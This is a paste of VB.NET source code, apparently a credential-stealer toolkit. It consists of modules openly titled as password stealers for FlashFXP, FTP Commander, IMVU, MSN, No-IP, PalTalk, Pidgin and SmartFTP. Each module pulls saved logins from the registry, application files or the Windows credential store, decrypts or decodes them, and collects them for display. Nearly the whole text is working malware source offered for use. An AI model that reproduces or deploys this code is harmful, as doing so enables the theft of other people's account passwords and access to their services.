- Dim sUser As String = Cut(sFile, "user=", vbNewLine)
- Dim sPwd As String = Cut(sFile, "pass=", vbNewLine)
- Dim sEntry As String = Cut(sFile, "created=", vbNewLine)
- If Not sUser = "" Then
- Try
- FlashFXP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd + " (Encrypt)"
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============FlashFXP==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Entry: " & sEntry)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Host: " & sHost)
- Form1.ztext.AppendText(": " & sPort)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("User: " & sUser)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & sPwd)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- Catch ex As Exception
- Form1.ztext.AppendText("============FlashFXP==============")
- Form1.ztext.AppendText(vbNewLine)
- Form1.ztext.AppendText("FlashFXP Couldn't Be Recovered!")
- Form1.ztext.AppendText(vbNewLine)
- Form1.ztext.AppendText("=================================")
- End Try
- Else
- End If
- End Function
- End Module
- [/php]
- [b]FTP Commande Password Stealerr[/b]
- [php]
- Module FTPCommander
- Function FtpCommander() As String
- Dim sPath As String = Replace(RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FTP Commander\UninstallString"), "uninstall.exe", vbNullString) & "Ftplist.txt"
- Dim sFile As String = ReadLine(sPath, -1)
- Dim sHost As String = Cut(sFile, ";Server=", ";Port=")
- Dim sPort As String = Cut(sFile, ";Port=", ";Password=")
- Dim sUser As String = Cut(sFile, ";User=", ";Anonymous=")
- Dim sPwd As String = Cut(sFile, ";Password=", ";User=")
- Dim sEntry As String = Cut(sFile, "Name=", ";Server=")
- If Not sUser = "" Then
- Try
- FtpCommander = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Pwd: " + sPwd
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============FTP Commander==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Entry: " & sEntry)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Host: " & sHost)
- Form1.ztext.AppendText(": " & sPort)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("User: " & sUser)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & sPwd)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- Catch ex As Exception
- End Try
- Else
- End If
- End Function
- End Module
- [/php]
- [b]IMVU Password Stealer[/b]
- [php]
- Module Imvu
- Function ReadKey(ByRef hKey As String) As Object ' // Function for Read REG Values
- On Error GoTo Error_Renamed ' // If Error dont Display Error
- Dim X As Object ' //
- X = CreateObject("WScript.shell") ' // Create REG Object
- ReadKey = X.regread(hKey) ' // Read The Key
- Exit Function
- Error_Renamed: ReadKey = vbNullString ' // If Error Readkey = ""
- End Function
- Public Function Hex2Ascii(ByVal Text As String) As String
- Dim Value As Object
- Dim num As Object
- Dim i As Object ' // Simple Function for Pass Hex to Ascii
- Value = Nothing
- For i = 1 To Len(Text) ' Len of Encripted Text
- num = Mid(Text, i, 2) ' // Go Chr by Chr
- Value = Value & Chr(Val("&h" & num)) ' // Pass from Hex
- i = i + 1 ' // +1
- Next i ' Next Chr
- Hex2Ascii = Value ' //
- End Function
- Public Function DoToVu() As String
- Dim sUser, sPass As String ' // Some Variables
- sUser = "HKEY_CURRENT_USER\Software\IMVU\username\" ' // Username REG Path
- sPass = "HKEY_CURRENT_USER\Software\IMVU\password\" ' // Password REG Path
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============IMVU==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Username: " & ReadKey(sUser))
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & Hex2Ascii(ReadKey(sPass)))
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- Sex:
- Exit Function
- End Function
- End Module
- 'MSN Password Stealer
- [php]
- Imports System.Collections.Generic
- Imports System.Text
- Imports System.Runtime.InteropServices
- Imports System.IO
- Module MSN
- <DllImport("advapi32.dll", SetLastError:=True, CharSet:=CharSet.Unicode)> _
- Public Function CredEnumerateW(ByVal filter As String, ByVal flag As UInteger, ByVal count As UInteger, ByVal pCredentials As IntPtr) As Boolean
- End Function
- <DllImport("crypt32", CharSet:=CharSet.Auto, SetLastError:=True)> _
- Friend Function CryptUnprotectData(ByRef dataIn As DATA_BLOB, ByVal ppszDataDescr As Integer, ByVal optionalEntropy As Integer, ByVal pvReserved As Integer, ByVal pPromptStruct As Integer, ByVal dwFlags As Integer, _
- ByVal pDataOut As DATA_BLOB) As Boolean
- End Function
- Friend Structure CREDENTIAL
- Public Flags As Integer
- Public Type As Integer
- <MarshalAs(UnmanagedType.LPWStr)> _
- Public TargetName As String
- <MarshalAs(UnmanagedType.LPWStr)> _
- Public Comment As String
- Public LastWritten As Long
- Public CredentialBlobSize As Integer
- Public CredentialBlob As Integer
- Public Persist As Integer
- Public AttributeCount As Integer
- Public Attributes As IntPtr
- <MarshalAs(UnmanagedType.LPWStr)> _
- Public TargetAlias As String
- <MarshalAs(UnmanagedType.LPWStr)> _
- Public UserName As String
- End Structure
- Private Cred As CREDENTIAL
- Friend Structure DATA_BLOB
- Public cbData As Integer
- Public pbData As Integer
- End Structure
- Friend Structure UserDetails
- Public uName As String
- Public uPass As String
- End Structure
- Public count As UInteger
- Public pCredentials As IntPtr = IntPtr.Zero
- Public dataIn As DATA_BLOB
- Public dataOut As DATA_BLOB
- Public uDetail As UserDetails
- Public Function getPwd() As String()
- Password()
- Dim pass As String() = {uDetail.uName, uDetail.uPass}
- Return pass
- End Function
- Public Sub Password()
- Try
- Dim ptr As IntPtr = Marshal.ReadIntPtr(pCredentials, 0 * 4)
- Cred = CType(Marshal.PtrToStructure(ptr, Cred.[GetType]()), CREDENTIAL)
- dataIn.pbData = Cred.CredentialBlob
- dataIn.cbData = Cred.CredentialBlobSize
- CryptUnprotectData(dataIn, 0, 0, 0, 0, 1, _
- dataOut)
- dataOut.pbData = dataIn.pbData
- uDetail.uName = Cred.UserName
- uDetail.uPass = (Marshal.PtrToStringUni(New IntPtr(dataOut.pbData)))
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============MSN==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Username: " & uDetail.uName)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & uDetail.uPass)
- Form1.ztext.AppendText(nl)
- Exit Sub
- Catch x As Exception
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============MSN==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("MSN Could not be recovered!")
- Form1.ztext.AppendText(nl)
- Exit Sub
- End Try
- End Sub
- End Module
- 'NO-IP Password Stealer
- Module No_IP
- Public Function base64Decode(ByVal data As String) As String
- Try
- Dim encoder As New System.Text.UTF8Encoding()
- Dim utf8Decode As System.Text.Decoder = encoder.GetDecoder()
- Dim todecode_byte As Byte() = Convert.FromBase64String(Data)
- Dim charCount As Integer = utf8Decode.GetCharCount(todecode_byte, 0, todecode_byte.Length)
- Dim decoded_char As Char() = New Char(charCount - 1) {}
- utf8Decode.GetChars(todecode_byte, 0, todecode_byte.Length, decoded_char, 0)
- Dim result As String = New [String](decoded_char)
- Return result
- Catch e As Exception
- End Try
- End Function
- Function IpRecord() As String
- Try
- IpRecord = Nothing
- Dim Username As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Username", Nothing)
- Dim Password As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Password", Nothing)
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============IMVU==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Username: " & Username)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & base64Decode(Password))
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- Catch
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============IMVU==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("IMVU Not Installed!")
- Form1.ztext.AppendText(nl)
- End Try
- End Function
- End Module
- 'PalTalk Password Stealer
- Module PalTalk
- Public Function GetHDSerial() As String
- Dim disk As New System.Management.ManagementObject( _
- "Win32_LogicalDisk.DeviceID=""C:""")
- Dim diskPropertyA As System.Management.PropertyData = _
- disk.Properties("VolumeSerialNumber")
- Return diskPropertyA.Value.ToString()
- End Function
- Public Function paltalkscene() As String
- Try
- Dim ser() As Char = GetHDSerial().ToCharArray
- Dim reg As Microsoft.Win32.RegistryKey = Microsoft.Win32.Registry.CurrentUser
- Dim out As String = ""
- reg = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("Software\Paltalk")
- Dim users As String() = reg.GetSubKeyNames()
- reg.Close()
- For Each s As String In users
- Dim t, o, i, x As Integer
- Dim pass As String = Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\Software\Paltalk\" & s, "pwd", "")
- Dim chr1 As Char() = pass.ToCharArray
- Dim passarr(pass.Length / 4) As String
- While t <= UBound(chr1) - 4
- If t < UBound(chr1) - 4 Then
- passarr(o) = chr1(t) & chr1(t + 1) & chr1(t + 2)
- End If
- t += 4
- o += 1
- End While
- Dim key As String = ""
- For Each c As Char In s
- key += c
- If i <= UBound(ser) Then
- key += ser(i)
- End If
- i = i + 1
- Next
- key = key & key & key
- Dim chr_arr As Char() = key.ToCharArray
- Dim blainpass As String = ""
- blainpass += Chr(passarr(0) - 122 - Asc(key.Substring(key.Length - 1, 1)))
- For x = 1 To UBound(passarr)
- Dim tempchr As Char
- If passarr(x) Is Nothing Then
- Else
- tempchr = Chr(passarr(x) - x - Asc(chr_arr(x - 1)) - 122)
- blainpass += tempchr
- End If
- Next x
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============PalTalk==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Username: " & s)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & blainpass)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- Next
- Return out
- Catch ex As Exception
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============PalTalk==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("PalTalk Not Installed!")
- Form1.ztext.AppendText(nl)
- Return "---"
- End Try
- End Function
- End Module
- 'Pidgin Password Stealer
- Option Explicit On
- Imports System.IO
- Imports System.Xml
- Module Pidgin
- Public Function GetPidgin() As String
- Dim ReadXML As New XmlDocument
- Dim i As Integer
- Dim OutAll = Nothing
- GetPidgin = ""
- Dim FilePath As String = Environ("appdata") & "\.purple\accounts.xml"
- If File.Exists(FilePath) <> True Then
- Exit Function
- Else
- Try
- ReadXML.Load(FilePath)
- Dim Protocol As XmlNodeList = ReadXML.GetElementsByTagName("protocol")
- Dim Username As XmlNodeList = ReadXML.GetElementsByTagName("name")
- Dim Password As XmlNodeList = ReadXML.GetElementsByTagName("password")
- For i = 0 To Protocol.Count - 1
- OutAll = OutAll & "Pidgin Stealer Logs!" & vbNewLine & "Protocol: " & Protocol(i).InnerText & vbCrLf _
- & "Username: " & Username(i).InnerText & vbCrLf _
- & "Password: " & Password(i).InnerText & vbCrLf & vbNewLine
- Next
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============Pidgin==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Username: " & Username(i).InnerText)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & Password(i).InnerText)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- Catch ex As Exception
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============Pidgin==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Pidgin Not Installed!")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- End Try
- End If
- End Function
- End Module
- 'SmartFTP Password Stealer
- Module SmartFTP
- Function SmartFTP() As String
- Dim sPath As String = Environ$("APPDATA") & "\SmartFTP\Client 2.0\Favorites\Quick Connect\" & Dir(Environ$("APPDATA") & "\SmartFTP\Client 2.0\Favorites\Quick Connect\*.xml")
- Dim sFile As String = ReadFile(sPath)
- Dim sHost As String = Cut(sFile, "<Host>", "</Host>")
- Dim sPort As String = Cut(sFile, "<Port>", "</Port>")
- Dim sUser As String = Cut(sFile, "<User>", "</User>")
- Dim sPwd As String = Cut(sFile, "<Password>", "</Password>")
- Dim sEntry As String = Cut(sFile, "<Name>", "</Name>")
- If Not sUser = "" Then
- Try
- SmartFTP = "Entry: " + sEntry + vbNewLine + "Host: " + sHost + ":" + sPort + vbNewLine + "User: " + sUser + vbNewLine + "Password: " + sPwd + " (Encrypt)"
- Dim nl As String = vbNewLine
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("============SmartFTP==============")
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Entry: " & sEntry)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Host: " & sHost)
- Form1.ztext.AppendText(": " & sPort)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("User: " & sUser)
- Form1.ztext.AppendText(nl)
- Form1.ztext.AppendText("Password: " & sPwd)
- Form1.ztext.AppendText("=============================")
- Form1.ztext.AppendText(nl)
- Catch ex As Exception
- Form1.ztext.AppendText("============SmartFTP==============")
- Form1.ztext.AppendText(vbNewLine)
- Form1.ztext.AppendText("SmartFTP Couldn't Be Recovered!")
- Form1.ztext.AppendText(vbNewLine)
- Form1.ztext.AppendText("=================================")
- End Try
- Else
- End If
- End Function
- Function ReadFile(ByVal sFile As String) As String
- On Error Resume Next
- Dim OpenFile As New System.IO.StreamReader(sFile)
- ReadFile = OpenFile.ReadToEnd.ToString
- End Function
- Function Cut(ByVal sInhalt As String, ByVal sText As String, ByVal stext2 As String) As String
- On Error Resume Next
- Dim c() As String
- Dim c2() As String
- c = Split(sInhalt, sText)
- c2 = Split(c(1), stext2)
- Cut = c2(0)
- End Function
- Function RegRead(ByVal hKey As String) As String
- Dim wshShell As Object = CreateObject("WScript.Shell")
- On Error Resume Next
- RegRead = wshShell.RegRead(hKey)
- End Function
- Public Function ReadLine(ByVal filename As String, _
- ByVal line As Integer) As String
- Try
- Dim lines As String() = My.Computer.FileSystem.ReadAllText( _
- filename, System.Text.Encoding.Default).Split(vbCrLf)
- If line > 0 Then
- Return lines(line - 1)
- ElseIf line < 0 Then
- Return lines(lines.Length + line - 1)
- Else
- Return ""
- End If
- Catch ex As Exception
- Return ""
- End Try
- End Function
- End Module
Add Comment
Please, Sign In to add comment